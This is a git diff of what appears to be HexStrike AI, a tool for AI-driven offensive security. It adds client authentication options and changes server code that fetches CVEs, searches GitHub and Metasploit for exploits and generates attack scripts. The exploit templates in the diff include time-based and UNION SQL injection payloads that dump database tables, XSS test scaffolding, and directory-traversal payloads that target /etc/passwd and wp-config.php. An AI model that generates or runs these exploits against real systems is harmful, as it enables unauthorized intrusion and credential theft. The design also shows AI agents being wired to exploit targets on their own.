diff --git a/hexstrike_mcp.py b/hexstrike_mcp.py index 23b083b47..e80e85a35 100644 --- a/hexstrike_mcp.py +++ b/hexstrike_mcp.py @@ -24,6 +24,7 @@ from typing import Dict, Any, Optional import requests import time +import base64 from datetime import datetime from mcp.server.fastmcp import FastMCP @@ -147,18 +148,35 @@ def format(self, record): class HexStrikeClient: """Enhanced client for communicating with the HexStrike AI API Server""" - def __init__(self, server_url: str, timeout: int = DEFAULT_REQUEST_TIMEOUT): + def __init__(self, server_url: str, timeout: int = DEFAULT_REQUEST_TIMEOUT, auth_basic: str = "", auth_token: str = "", verify_ssl: bool = True): """ Initialize the HexStrike AI Client Args: server_url: URL of the HexStrike AI API Server timeout: Request timeout in seconds + auth_basic: Basic authentication credentials in "username:password" format + auth_token: Bearer token for authentication + verify_ssl: Whether to verify SSL certificates """ self.server_url = server_url.rstrip("/") self.timeout = timeout self.session = requests.Session() + if not verify_ssl: + self.session.verify = False # Disable SSL verification for self-signed certs + + if auth_token: + self.session.headers.update({ + "Authorization": f"Bearer {auth_token}" + }) + + if auth_basic: + encoded_credentials = base64.b64encode(auth_basic.encode()).decode() + self.session.headers.update({ + "Authorization": f"Basic {encoded_credentials}" + }) + # Try to connect to server with retries connected = False for i in range(MAX_RETRIES): @@ -5421,6 +5439,11 @@ def parse_args(): parser.add_argument("--timeout", type=int, default=DEFAULT_REQUEST_TIMEOUT, help=f"Request timeout in seconds (default: {DEFAULT_REQUEST_TIMEOUT})") parser.add_argument("--debug", action="store_true", help="Enable debug logging") + parser.add_argument("--auth-basic", type=str, default="", + help="Username:password for authentication with HexStrike AI server in front of reverse proxies") + parser.add_argument("--auth-token", type=str, default="", + help="Bearer token for authentication with HexStrike AI server") + parser.add_argument("--disable-ssl-verify", action="store_true", help="Disable SSL certificate verification when connecting to the HexStrike AI server in front of reverse proxies") return parser.parse_args() def main(): @@ -5436,9 +5459,20 @@ def main(): logger.info(f"🚀 Starting HexStrike AI MCP Client v6.0") logger.info(f"🔗 Connecting to: {args.server}") + auth_basic = args.auth_basic if args.auth_basic else "" + auth_token = args.auth_token if args.auth_token else "" + + if args.auth_basic and args.auth_token: + logger.warning("⚠️ Both basic auth and token auth provided - token auth will take precedence") + auth_basic = "" + try: # Initialize the HexStrike AI client - hexstrike_client = HexStrikeClient(args.server, args.timeout) + verify_ssl = True + if args.disable_ssl_verify: + verify_ssl = False + + hexstrike_client = HexStrikeClient(args.server, args.timeout, auth_basic=auth_basic, auth_token=auth_token, verify_ssl=verify_ssl) # Check server health and log the result health = hexstrike_client.check_health() diff --git a/hexstrike_server.py b/hexstrike_server.py index baa5db420..4dd20a13a 100644 --- a/hexstrike_server.py +++ b/hexstrike_server.py @@ -39,7 +39,7 @@ import venv import zipfile from pathlib import Path -from flask import Flask, request, jsonify +from flask import Flask, request, jsonify, abort import psutil import signal import requests @@ -97,6 +97,7 @@ # API Configuration API_PORT = int(os.environ.get('HEXSTRIKE_PORT', 8888)) API_HOST = os.environ.get('HEXSTRIKE_HOST', '127.0.0.1') +API_TOKEN = os.environ.get("HEXSTRIKE_API_TOKEN", None) # e.g. export API_TOKEN=secret-token # ============================================================================ # MODERN VISUAL ENGINE (v2.0 ENHANCEMENT) @@ -5956,52 +5957,52 @@ def fetch_latest_cves(self, hours=24, severity_filter="HIGH,CRITICAL"): """Fetch latest CVEs from NVD and other real sources""" try: logger.info(f"🔍 Fetching CVEs from last {hours} hours with severity: {severity_filter}") - + # Calculate date range for CVE search end_date = datetime.now() start_date = end_date - timedelta(hours=hours) - + # Format dates for NVD API (ISO 8601 format) start_date_str = start_date.strftime('%Y-%m-%dT%H:%M:%S.000') end_date_str = end_date.strftime('%Y-%m-%dT%H:%M:%S.000') - + # NVD API endpoint nvd_url = "https://services.nvd.nist.gov/rest/json/cves/2.0" - + # Parse severity filter severity_levels = [s.strip().upper() for s in severity_filter.split(",")] - + all_cves = [] - + # Query NVD API with rate limiting compliance params = { 'lastModStartDate': start_date_str, 'lastModEndDate': end_date_str, 'resultsPerPage': 100 } - + try: # Add delay to respect NVD rate limits (6 seconds between requests for unauthenticated) import time - + logger.info(f"🌐 Querying NVD API: {nvd_url}") response = requests.get(nvd_url, params=params, timeout=30) - + if response.status_code == 200: nvd_data = response.json() vulnerabilities = nvd_data.get('vulnerabilities', []) - + logger.info(f"📊 Retrieved {len(vulnerabilities)} vulnerabilities from NVD") - + for vuln_item in vulnerabilities: cve_data = vuln_item.get('cve', {}) cve_id = cve_data.get('id', 'Unknown') - + # Extract CVSS scores and determine severity metrics = cve_data.get('metrics', {}) cvss_score = 0.0 severity = "UNKNOWN" - + # Try CVSS v3.1 first, then v3.0, then v2.0 if 'cvssMetricV31' in metrics and metrics['cvssMetricV31']: cvss_data = metrics['cvssMetricV31'][0]['cvssData'] @@ -6023,11 +6024,11 @@ def fetch_latest_cves(self, hours=24, severity_filter="HIGH,CRITICAL"): severity = "MEDIUM" else: severity = "LOW" - + # Filter by severity if specified if severity not in severity_levels and severity_levels != ['ALL']: continue - + # Extract description descriptions = cve_data.get('descriptions', []) description = "No description available" @@ -6035,13 +6036,13 @@ def fetch_latest_cves(self, hours=24, severity_filter="HIGH,CRITICAL"): if desc.get('lang') == 'en': description = desc.get('value', description) break - + # Extract references references = [] ref_data = cve_data.get('references', []) for ref in ref_data[:5]: # Limit to first 5 references references.append(ref.get('url', '')) - + # Extract affected software (CPE data) affected_software = [] configurations = cve_data.get('configurations', []) @@ -6059,7 +6060,7 @@ def fetch_latest_cves(self, hours=24, severity_filter="HIGH,CRITICAL"): product = parts[4] version = parts[5] if parts[5] != '*' else 'all versions' affected_software.append(f"{vendor} {product} {version}") - + cve_entry = { "cve_id": cve_id, "description": description, @@ -6071,19 +6072,19 @@ def fetch_latest_cves(self, hours=24, severity_filter="HIGH,CRITICAL"): "references": references, "source": "NVD" } - + all_cves.append(cve_entry) - + else: logger.warning(f"⚠️ NVD API returned status code: {response.status_code}") - + except requests.exceptions.RequestException as e: logger.error(f"❌ Error querying NVD API: {str(e)}") - + # If no CVEs found from NVD, try alternative sources or provide informative response if not all_cves: logger.info("🔄 No recent CVEs found in specified timeframe, checking for any recent critical CVEs...") - + # Try a broader search for recent critical CVEs (last 7 days) try: broader_start = (datetime.now() - timedelta(days=7)).strftime('%Y-%m-%dT%H:%M:%S.000') @@ -6093,18 +6094,18 @@ def fetch_latest_cves(self, hours=24, severity_filter="HIGH,CRITICAL"): 'cvssV3Severity': 'CRITICAL', 'resultsPerPage': 20 } - + time.sleep(6) # Rate limit compliance response = requests.get(nvd_url, params=broader_params, timeout=30) - + if response.status_code == 200: nvd_data = response.json() vulnerabilities = nvd_data.get('vulnerabilities', []) - + for vuln_item in vulnerabilities[:10]: # Limit to 10 most recent cve_data = vuln_item.get('cve', {}) cve_id = cve_data.get('id', 'Unknown') - + # Extract basic info for recent critical CVEs descriptions = cve_data.get('descriptions', []) description = "No description available" @@ -6112,12 +6113,12 @@ def fetch_latest_cves(self, hours=24, severity_filter="HIGH,CRITICAL"): if desc.get('lang') == 'en': description = desc.get('value', description) break - + metrics = cve_data.get('metrics', {}) cvss_score = 0.0 if 'cvssMetricV31' in metrics and metrics['cvssMetricV31']: cvss_score = metrics['cvssMetricV31'][0]['cvssData'].get('baseScore', 0.0) - + cve_entry = { "cve_id": cve_id, "description": description, @@ -6129,14 +6130,14 @@ def fetch_latest_cves(self, hours=24, severity_filter="HIGH,CRITICAL"): "references": [f"https://nvd.nist.gov/vuln/detail/{cve_id}"], "source": "NVD (Recent Critical)" } - + all_cves.append(cve_entry) - + except Exception as broader_e: logger.warning(f"⚠️ Broader search also failed: {str(broader_e)}") - + logger.info(f"✅ Successfully retrieved {len(all_cves)} CVEs") - + return { "success": True, "cves": all_cves, @@ -6146,7 +6147,7 @@ def fetch_latest_cves(self, hours=24, severity_filter="HIGH,CRITICAL"): "data_sources": ["NVD API v2.0"], "search_period": f"{start_date_str} to {end_date_str}" } - + except Exception as e: logger.error(f"💥 Error fetching CVEs: {str(e)}") return { @@ -6160,16 +6161,16 @@ def analyze_cve_exploitability(self, cve_id): """Analyze CVE exploitability using real CVE data and threat intelligence""" try: logger.info(f"🔬 Analyzing exploitability for {cve_id}") - + # Fetch detailed CVE data from NVD nvd_url = f"https://services.nvd.nist.gov/rest/json/cves/2.0" params = {'cveId': cve_id} - + import time - + try: response = requests.get(nvd_url, params=params, timeout=30) - + if response.status_code != 200: logger.warning(f"⚠️ NVD API returned status {response.status_code} for {cve_id}") return { @@ -6177,10 +6178,10 @@ def analyze_cve_exploitability(self, cve_id): "error": f"Failed to fetch CVE data: HTTP {response.status_code}", "cve_id": cve_id } - + nvd_data = response.json() vulnerabilities = nvd_data.get('vulnerabilities', []) - + if not vulnerabilities: logger.warning(f"⚠️ No data found for CVE {cve_id}") return { @@ -6188,9 +6189,9 @@ def analyze_cve_exploitability(self, cve_id): "error": f"CVE {cve_id} not found in NVD database", "cve_id": cve_id } - + cve_data = vulnerabilities[0].get('cve', {}) - + # Extract CVSS metrics for exploitability analysis metrics = cve_data.get('metrics', {}) cvss_score = 0.0 @@ -6200,7 +6201,7 @@ def analyze_cve_exploitability(self, cve_id): privileges_required = "UNKNOWN" user_interaction = "UNKNOWN" exploitability_subscore = 0.0 - + # Analyze CVSS v3.1 metrics (preferred) if 'cvssMetricV31' in metrics and metrics['cvssMetricV31']: cvss_data = metrics['cvssMetricV31'][0]['cvssData'] @@ -6211,7 +6212,7 @@ def analyze_cve_exploitability(self, cve_id): privileges_required = cvss_data.get('privilegesRequired', 'UNKNOWN') user_interaction = cvss_data.get('userInteraction', 'UNKNOWN') exploitability_subscore = cvss_data.get('exploitabilityScore', 0.0) - + elif 'cvssMetricV30' in metrics and metrics['cvssMetricV30']: cvss_data = metrics['cvssMetricV30'][0]['cvssData'] cvss_score = cvss_data.get('baseScore', 0.0) @@ -6221,17 +6222,17 @@ def analyze_cve_exploitability(self, cve_id): privileges_required = cvss_data.get('privilegesRequired', 'UNKNOWN') user_interaction = cvss_data.get('userInteraction', 'UNKNOWN') exploitability_subscore = cvss_data.get('exploitabilityScore', 0.0) - + # Calculate exploitability score based on CVSS metrics exploitability_score = 0.0 - + # Base exploitability on CVSS exploitability subscore if available if exploitability_subscore > 0: exploitability_score = min(exploitability_subscore / 3.9, 1.0) # Normalize to 0-1 else: # Calculate based on individual CVSS components score_components = 0.0 - + # Attack Vector scoring if attack_vector == "NETWORK": score_components += 0.4 @@ -6241,25 +6242,25 @@ def analyze_cve_exploitability(self, cve_id): score_components += 0.2 elif attack_vector == "PHYSICAL": score_components += 0.1 - + # Attack Complexity scoring if attack_complexity == "LOW": score_components += 0.3 elif attack_complexity == "HIGH": score_components += 0.1 - + # Privileges Required scoring if privileges_required == "NONE": score_components += 0.2 elif privileges_required == "LOW": score_components += 0.1 - + # User Interaction scoring if user_interaction == "NONE": score_components += 0.1 - + exploitability_score = min(score_components, 1.0) - + # Determine exploitability level if exploitability_score >= 0.8: exploitability_level = "HIGH" @@ -6269,7 +6270,7 @@ def analyze_cve_exploitability(self, cve_id): exploitability_level = "LOW" else: exploitability_level = "VERY_LOW" - + # Extract description for additional context descriptions = cve_data.get('descriptions', []) description = "" @@ -6277,7 +6278,7 @@ def analyze_cve_exploitability(self, cve_id): if desc.get('lang') == 'en': description = desc.get('value', '') break - + # Analyze description for exploit indicators exploit_keywords = [ 'remote code execution', 'rce', 'buffer overflow', 'stack overflow', @@ -6286,31 +6287,31 @@ def analyze_cve_exploitability(self, cve_id): 'privilege escalation', 'directory traversal', 'path traversal', 'deserialization', 'xxe', 'ssrf', 'csrf', 'xss' ] - + description_lower = description.lower() exploit_indicators = [kw for kw in exploit_keywords if kw in description_lower] - + # Adjust exploitability based on vulnerability type if any(kw in description_lower for kw in ['remote code execution', 'rce', 'buffer overflow']): exploitability_score = min(exploitability_score + 0.2, 1.0) elif any(kw in description_lower for kw in ['authentication bypass', 'privilege escalation']): exploitability_score = min(exploitability_score + 0.15, 1.0) - + # Check for public exploit availability indicators public_exploits = False exploit_maturity = "UNKNOWN" - + # Look for exploit references in CVE references references = cve_data.get('references', []) exploit_sources = ['exploit-db.com', 'github.com', 'packetstormsecurity.com', 'metasploit'] - + for ref in references: ref_url = ref.get('url', '').lower() if any(source in ref_url for source in exploit_sources): public_exploits = True exploit_maturity = "PROOF_OF_CONCEPT" break - + # Determine weaponization level weaponization_level = "LOW" if public_exploits and exploitability_score > 0.7: @@ -6319,14 +6320,14 @@ def analyze_cve_exploitability(self, cve_id): weaponization_level = "MEDIUM" elif exploitability_score > 0.8: weaponization_level = "MEDIUM" - + # Active exploitation assessment active_exploitation = False if exploitability_score > 0.8 and public_exploits: active_exploitation = True elif severity in ["CRITICAL", "HIGH"] and attack_vector == "NETWORK": active_exploitation = True - + # Priority recommendation if exploitability_score > 0.8 and severity == "CRITICAL": priority = "IMMEDIATE" @@ -6336,11 +6337,11 @@ def analyze_cve_exploitability(self, cve_id): priority = "MEDIUM" else: priority = "LOW" - + # Extract publication and modification dates published_date = cve_data.get('published', '') last_modified = cve_data.get('lastModified', '') - + analysis = { "success": True, "cve_id": cve_id, @@ -6373,11 +6374,11 @@ def analyze_cve_exploitability(self, cve_id): "data_source": "NVD API v2.0", "analysis_timestamp": datetime.now().isoformat() } - + logger.info(f"✅ Completed exploitability analysis for {cve_id}: {exploitability_level} ({exploitability_score:.2f})") - + return analysis - + except requests.exceptions.RequestException as e: logger.error(f"❌ Network error analyzing {cve_id}: {str(e)}") return { @@ -6385,7 +6386,7 @@ def analyze_cve_exploitability(self, cve_id): "error": f"Network error: {str(e)}", "cve_id": cve_id } - + except Exception as e: logger.error(f"💥 Error analyzing CVE {cve_id}: {str(e)}") return { @@ -6398,14 +6399,14 @@ def search_existing_exploits(self, cve_id): """Search for existing exploits from real sources""" try: logger.info(f"🔎 Searching existing exploits for {cve_id}") - + all_exploits = [] sources_searched = [] - + # 1. Search GitHub for PoCs and exploits try: logger.info(f"🔍 Searching GitHub for {cve_id} exploits...") - + # GitHub Search API github_search_url = "https://api.github.com/search/repositories" github_params = { @@ -6414,18 +6415,18 @@ def search_existing_exploits(self, cve_id): 'order': 'desc', 'per_page': 10 } - + github_response = requests.get(github_search_url, params=github_params, timeout=15) - + if github_response.status_code == 200: github_data = github_response.json() repositories = github_data.get('items', []) - + for repo in repositories[:5]: # Limit to top 5 results # Check if CVE is actually mentioned in repo name or description repo_name = repo.get('name', '').lower() repo_desc = repo.get('description', '').lower() - + if cve_id.lower() in repo_name or cve_id.lower() in repo_desc: exploit_entry = { "source": "github", @@ -6443,51 +6444,51 @@ def search_existing_exploits(self, cve_id): "verified": False, "reliability": "UNVERIFIED" } - + # Assess reliability based on repo metrics stars = repo.get('stargazers_count', 0) forks = repo.get('forks_count', 0) - + if stars >= 50 or forks >= 10: exploit_entry["reliability"] = "GOOD" elif stars >= 20 or forks >= 5: exploit_entry["reliability"] = "FAIR" - + all_exploits.append(exploit_entry) - + sources_searched.append("github") logger.info(f"✅ Found {len([e for e in all_exploits if e['source'] == 'github'])} GitHub repositories") - + else: logger.warning(f"⚠️ GitHub search failed with status {github_response.status_code}") - + except requests.exceptions.RequestException as e: logger.error(f"❌ GitHub search error: {str(e)}") - + # 2. Search Exploit-DB via searchsploit-like functionality try: logger.info(f"🔍 Searching for {cve_id} in exploit databases...") - + # Since we can't directly access Exploit-DB API, we'll use a web search approach # or check if the CVE references contain exploit-db links - + # First, get CVE data to check references nvd_url = "https://services.nvd.nist.gov/rest/json/cves/2.0" nvd_params = {'cveId': cve_id} - + import time time.sleep(1) # Rate limiting - + nvd_response = requests.get(nvd_url, params=nvd_params, timeout=20) - + if nvd_response.status_code == 200: nvd_data = nvd_response.json() vulnerabilities = nvd_data.get('vulnerabilities', []) - + if vulnerabilities: cve_data = vulnerabilities[0].get('cve', {}) references = cve_data.get('references', []) - + # Check references for exploit sources exploit_sources = { 'exploit-db.com': 'exploit-db', @@ -6495,11 +6496,11 @@ def search_existing_exploits(self, cve_id): 'metasploit': 'metasploit', 'rapid7.com': 'rapid7' } - + for ref in references: ref_url = ref.get('url', '') ref_url_lower = ref_url.lower() - + for source_domain, source_name in exploit_sources.items(): if source_domain in ref_url_lower: exploit_entry = { @@ -6516,31 +6517,31 @@ def search_existing_exploits(self, cve_id): "reliability": "GOOD" if source_name == "exploit-db" else "FAIR" } all_exploits.append(exploit_entry) - + if source_name not in sources_searched: sources_searched.append(source_name) - + except Exception as e: logger.error(f"❌ Exploit database search error: {str(e)}") - + # 3. Search for Metasploit modules try: logger.info(f"🔍 Searching for Metasploit modules for {cve_id}...") - + # Search GitHub for Metasploit modules containing the CVE msf_search_url = "https://api.github.com/search/code" msf_params = { 'q': f'{cve_id} filename:*.rb repo:rapid7/metasploit-framework', 'per_page': 5 } - + time.sleep(1) # Rate limiting msf_response = requests.get(msf_search_url, params=msf_params, timeout=15) - + if msf_response.status_code == 200: msf_data = msf_response.json() code_results = msf_data.get('items', []) - + for code_item in code_results: file_path = code_item.get('path', '') if 'exploits/' in file_path or 'auxiliary/' in file_path: @@ -6558,24 +6559,24 @@ def search_existing_exploits(self, cve_id): "reliability": "EXCELLENT" } all_exploits.append(exploit_entry) - + if code_results and "metasploit" not in sources_searched: sources_searched.append("metasploit") - + elif msf_response.status_code == 403: logger.warning("⚠️ GitHub API rate limit reached for code search") else: logger.warning(f"⚠️ Metasploit search failed with status {msf_response.status_code}") - + except requests.exceptions.RequestException as e: logger.error(f"❌ Metasploit search error: {str(e)}") - + # Add default sources to searched list default_sources = ["exploit-db", "github", "metasploit", "packetstorm"] for source in default_sources: if source not in sources_searched: sources_searched.append(source) - + # Sort exploits by reliability and date reliability_order = {"EXCELLENT": 4, "GOOD": 3, "FAIR": 2, "UNVERIFIED": 1} all_exploits.sort(key=lambda x: ( @@ -6583,9 +6584,9 @@ def search_existing_exploits(self, cve_id): x.get("stars", 0), x.get("date_published", "") ), reverse=True) - + logger.info(f"✅ Found {len(all_exploits)} total exploits from {len(sources_searched)} sources") - + return { "success": True, "cve_id": cve_id, @@ -6600,7 +6601,7 @@ def search_existing_exploits(self, cve_id): }, "search_timestamp": datetime.now().isoformat() } - + except Exception as e: logger.error(f"💥 Error searching exploits for {cve_id}: {str(e)}") return { @@ -7163,12 +7164,12 @@ def generate_exploit_from_cve(self, cve_data, target_info): try: cve_id = cve_data.get("cve_id", "") description = cve_data.get("description", "").lower() - + logger.info(f"🛠️ Generating specific exploit for {cve_id}") # Enhanced vulnerability classification using real CVE data vuln_type, specific_details = self._analyze_vulnerability_details(description, cve_data) - + # Generate real, specific exploit based on CVE details if vuln_type == "sql_injection": exploit_code = self._generate_sql_injection_exploit(cve_data, target_info, specific_details) @@ -7293,7 +7294,7 @@ def _advanced_obfuscation(self, code): def _analyze_vulnerability_details(self, description, cve_data): """Analyze CVE data to extract specific vulnerability details""" import re # Import at the top of the method - + vuln_type = "generic" specific_details = { "endpoints": [], @@ -7303,10 +7304,10 @@ def _analyze_vulnerability_details(self, description, cve_data): "version": "unknown", "attack_vector": "unknown" } - + # Extract specific details from description description_lower = description.lower() - + # SQL Injection detection and details if any(keyword in description_lower for keyword in ["sql injection", "sqli"]): vuln_type = "sql_injection" @@ -7318,7 +7319,7 @@ def _analyze_vulnerability_details(self, description, cve_data): param_matches = re.findall(r'(?:via|parameter|param)\s+([a-zA-Z_][a-zA-Z0-9_]*)', description) if param_matches: specific_details["parameters"] = param_matches - + # XSS detection elif any(keyword in description_lower for keyword in ["cross-site scripting", "xss"]): vuln_type = "xss" @@ -7329,12 +7330,12 @@ def _analyze_vulnerability_details(self, description, cve_data): specific_details["xss_type"] = "reflected" else: specific_details["xss_type"] = "unknown" - + # XXE detection elif any(keyword in description_lower for keyword in ["xxe", "xml external entity"]): vuln_type = "xxe" specific_details["payload_location"] = "xml" - + # File read/traversal detection elif any(keyword in description_lower for keyword in ["file read", "directory traversal", "path traversal", "arbitrary file", "file disclosure", "local file inclusion", "lfi", "file inclusion"]): vuln_type = "file_read" @@ -7344,34 +7345,34 @@ def _analyze_vulnerability_details(self, description, cve_data): specific_details["traversal_type"] = "lfi" else: specific_details["traversal_type"] = "file_read" - + # Extract parameter names for LFI param_matches = re.findall(r'(?:via|parameter|param)\s+([a-zA-Z_][a-zA-Z0-9_]*)', description) if param_matches: specific_details["parameters"] = param_matches - + # Authentication bypass elif any(keyword in description_lower for keyword in ["authentication bypass", "auth bypass", "login bypass"]): vuln_type = "authentication_bypass" - + # RCE detection elif any(keyword in description_lower for keyword in ["remote code execution", "rce", "command injection"]): vuln_type = "rce" - + # Deserialization elif any(keyword in description_lower for keyword in ["deserialization", "unserialize", "pickle"]): vuln_type = "deserialization" - + # Buffer overflow elif any(keyword in description_lower for keyword in ["buffer overflow", "heap overflow", "stack overflow"]): vuln_type = "buffer_overflow" - + # Extract software and version info software_match = re.search(r'(\w+(?:\s+\w+)*)\s+v?(\d+(?:\.\d+)*)', description) if software_match: specific_details["software"] = software_match.group(1) specific_details["version"] = software_match.group(2) - + return vuln_type, specific_details def _generate_sql_injection_exploit(self, cve_data, target_info, details): @@ -7379,7 +7380,7 @@ def _generate_sql_injection_exploit(self, cve_data, target_info, details): cve_id = cve_data.get("cve_id", "") endpoint = details.get("endpoints", ["/vulnerable.php"])[0] if details.get("endpoints") else "/vulnerable.php" parameter = details.get("parameters", ["id"])[0] if details.get("parameters") else "id" - + return f'''#!/usr/bin/env python3 # SQL Injection Exploit for {cve_id} # Vulnerability: {cve_data.get("description", "")[:100]}... @@ -7396,18 +7397,18 @@ def __init__(self, target_url): self.endpoint = "{endpoint}" self.parameter = "{parameter}" self.session = requests.Session() - + def test_injection(self): """Test if target is vulnerable""" print(f"[+] Testing SQL injection on {{self.target_url}}{{self.endpoint}}") - + # Time-based blind SQL injection test payloads = [ "1' AND SLEEP(3)--", "1' OR SLEEP(3)--", "1'; WAITFOR DELAY '00:00:03'--" ] - + for payload in payloads: start_time = time.time() try: @@ -7417,31 +7418,31 @@ def test_injection(self): timeout=10 ) elapsed = time.time() - start_time - + if elapsed >= 3: print(f"[+] Vulnerable! Payload: {{payload}}") return True - + except requests.exceptions.Timeout: print(f"[+] Likely vulnerable (timeout): {{payload}}") return True except Exception as e: continue - + return False - + def extract_database_info(self): """Extract database information""" print("[+] Extracting database information...") - + queries = {{ "version": "SELECT VERSION()", "user": "SELECT USER()", "database": "SELECT DATABASE()" }} - + results = {{}} - + for info_type, query in queries.items(): payload = f"1' UNION SELECT 1,({query}),3--" try: @@ -7449,37 +7450,37 @@ def extract_database_info(self): f"{{self.target_url}}{{self.endpoint}}", params={{self.parameter: payload}} ) - + # Simple extraction (would need customization per application) if response.status_code == 200: results[info_type] = "Check response manually" print(f"[+] {{info_type.title()}}: Check response for {{query}}") - + except Exception as e: print(f"[-] Error extracting {{info_type}}: {{e}}") - + return results - + def dump_tables(self): """Dump table names""" print("[+] Attempting to dump table names...") - + # MySQL/MariaDB payload = "1' UNION SELECT 1,GROUP_CONCAT(table_name),3 FROM information_schema.tables WHERE table_schema=database()--" - + try: response = self.session.get( f"{{self.target_url}}{{self.endpoint}}", params={{self.parameter: payload}} ) - + if response.status_code == 200: print("[+] Tables dumped - check response") return response.text - + except Exception as e: print(f"[-] Error dumping tables: {{e}}") - + return None def main(): @@ -7487,13 +7488,13 @@ def main(): print(f"Usage: python3 {{sys.argv[0]}} ") print(f"Example: python3 {{sys.argv[0]}} http://target.com") sys.exit(1) - + target_url = sys.argv[1] exploit = SQLiExploit(target_url) - + print(f"[+] SQL Injection Exploit for {cve_id}") print(f"[+] Target: {{target_url}}") - + if exploit.test_injection(): print("[+] Target appears vulnerable!") exploit.extract_database_info() @@ -7509,7 +7510,7 @@ def _generate_xss_exploit(self, cve_data, target_info, details): """Generate specific XSS exploit based on CVE details""" cve_id = cve_data.get("cve_id", "") xss_type = details.get("xss_type", "reflected") - + return f'''#!/usr/bin/env python3 # Cross-Site Scripting (XSS) Exploit for {cve_id} # Type: {xss_type.title()} XSS @@ -7523,7 +7524,7 @@ class XSSExploit: def __init__(self, target_url): self.target_url = target_url.rstrip('/') self.session = requests.Session() - + def generate_payloads(self): """Generate XSS payloads for testing""" payloads = [ @@ -7531,48 +7532,48 @@ def generate_payloads(self): "", "", "", - + # Bypass attempts "", "javascript:alert('XSS-{cve_id}')", "", - + # Advanced payloads "", "" ] - + return payloads - + def test_reflected_xss(self, parameter="q"): """Test for reflected XSS""" print(f"[+] Testing reflected XSS on parameter: {{parameter}}") - + payloads = self.generate_payloads() - + for i, payload in enumerate(payloads): try: response = self.session.get( self.target_url, params={{parameter: payload}} ) - + if payload in response.text: print(f"[+] Potential XSS found with payload {{i+1}}: {{payload[:50]}}...") return True - + except Exception as e: print(f"[-] Error testing payload {{i+1}}: {{e}}") continue - + return False - + def test_stored_xss(self, endpoint="/comment", data_param="comment"): """Test for stored XSS""" print(f"[+] Testing stored XSS on endpoint: {{endpoint}}") - + payloads = self.generate_payloads() - + for i, payload in enumerate(payloads): try: # Submit payload @@ -7580,17 +7581,17 @@ def test_stored_xss(self, endpoint="/comment", data_param="comment"): f"{{self.target_url}}{{endpoint}}", data={{data_param: payload}} ) - + # Check if stored check_response = self.session.get(self.target_url) if payload in check_response.text: print(f"[+] Stored XSS found with payload {{i+1}}: {{payload[:50]}}...") return True - + except Exception as e: print(f"[-] Error testing stored payload {{i+1}}: {{e}}") continue - + return False def main(): @@ -7598,21 +7599,21 @@ def main(): print(f"Usage: python3 {{sys.argv[0]}} [parameter]") print(f"Example: python3 {{sys.argv[0]}} http://target.com/search q") sys.exit(1) - + target_url = sys.argv[1] parameter = sys.argv[2] if len(sys.argv) > 2 else "q" - + exploit = XSSExploit(target_url) - + print(f"[+] XSS Exploit for {cve_id}") print(f"[+] Target: {{target_url}}") - + if "{xss_type}" == "reflected" or "{xss_type}" == "unknown": if exploit.test_reflected_xss(parameter): print("[+] Reflected XSS vulnerability confirmed!") else: print("[-] No reflected XSS found") - + if "{xss_type}" == "stored" or "{xss_type}" == "unknown": if exploit.test_stored_xss(): print("[+] Stored XSS vulnerability confirmed!") @@ -7628,7 +7629,7 @@ def _generate_file_read_exploit(self, cve_data, target_info, details): cve_id = cve_data.get("cve_id", "") parameter = details.get("parameters", ["portal_type"])[0] if details.get("parameters") else "portal_type" traversal_type = details.get("traversal_type", "file_read") - + return f'''#!/usr/bin/env python3 # Local File Inclusion (LFI) Exploit for {cve_id} # Vulnerability: {cve_data.get("description", "")[:100]}... @@ -7643,42 +7644,42 @@ class FileReadExploit: def __init__(self, target_url): self.target_url = target_url.rstrip('/') self.session = requests.Session() - + def generate_payloads(self, target_file="/etc/passwd"): """Generate directory traversal payloads""" payloads = [ # Basic traversal "../" * 10 + target_file.lstrip('/'), "..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\windows\\\\system32\\\\drivers\\\\etc\\\\hosts", - + # URL encoded quote("../") * 10 + target_file.lstrip('/'), - + # Double encoding quote(quote("../")) * 10 + target_file.lstrip('/'), - + # Null byte (for older systems) "../" * 10 + target_file.lstrip('/') + "%00.txt", - + # Absolute paths target_file, "file://" + target_file, - + # Windows paths "C:\\\\windows\\\\system32\\\\drivers\\\\etc\\\\hosts", "C:/windows/system32/drivers/etc/hosts" ] - + return payloads - + def test_file_read(self, parameter="{parameter}"): """Test LFI vulnerability on WordPress""" print(f"[+] Testing LFI on parameter: {{parameter}}") - + # WordPress-specific files and common targets test_files = [ "/etc/passwd", - "/etc/hosts", + "/etc/hosts", "/proc/version", "/var/www/html/wp-config.php", "/var/log/apache2/access.log", @@ -7686,17 +7687,17 @@ def test_file_read(self, parameter="{parameter}"): "../../../../etc/passwd", "php://filter/convert.base64-encode/resource=wp-config.php" ] - + for target_file in test_files: payloads = self.generate_payloads(target_file) - + for i, payload in enumerate(payloads): try: response = self.session.get( self.target_url, params={{parameter: payload}} ) - + # Check for common file contents indicators = [ "root:", "daemon:", "bin:", "sys:", # /etc/passwd @@ -7704,42 +7705,42 @@ def test_file_read(self, parameter="{parameter}"): "Linux version", "Microsoft Windows", # system info " 10: print(f"[+] Successfully read {{filepath}}:") print("-" * 50) print(response.text) print("-" * 50) return response.text - + except Exception as e: continue - + print(f"[-] Could not read {{filepath}}") return None @@ -7748,16 +7749,16 @@ def main(): print(f"Usage: python3 {{sys.argv[0]}} [parameter] [file_to_read]") print(f"Example: python3 {{sys.argv[0]}} http://target.com/view file /etc/passwd") sys.exit(1) - + target_url = sys.argv[1] parameter = sys.argv[2] if len(sys.argv) > 2 else "file" specific_file = sys.argv[3] if len(sys.argv) > 3 else None - + exploit = FileReadExploit(target_url) - + print(f"[+] File Read Exploit for {cve_id}") print(f"[+] Target: {{target_url}}") - + if specific_file: exploit.read_specific_file(specific_file, parameter) else: @@ -7774,7 +7775,7 @@ def _generate_intelligent_generic_exploit(self, cve_data, target_info, details): """Generate intelligent generic exploit based on CVE analysis""" cve_id = cve_data.get("cve_id", "") description = cve_data.get("description", "") - + return f'''#!/usr/bin/env python3 # Generic Exploit for {cve_id} # Vulnerability: {description[:150]}... @@ -7789,41 +7790,41 @@ def __init__(self, target_url): self.target_url = target_url.rstrip('/') self.session = requests.Session() self.cve_id = "{cve_id}" - + def analyze_target(self): """Analyze target for vulnerability indicators""" print(f"[+] Analyzing target for {cve_id}") - + try: response = self.session.get(self.target_url) - + # Look for version indicators in response headers = response.headers content = response.text.lower() - + print(f"[+] Server: {{headers.get('Server', 'Unknown')}}") print(f"[+] Status Code: {{response.status_code}}") - + # Check for software indicators software_indicators = [ "{details.get('software', '').lower()}", "version {details.get('version', '')}", ] - + for indicator in software_indicators: if indicator and indicator in content: 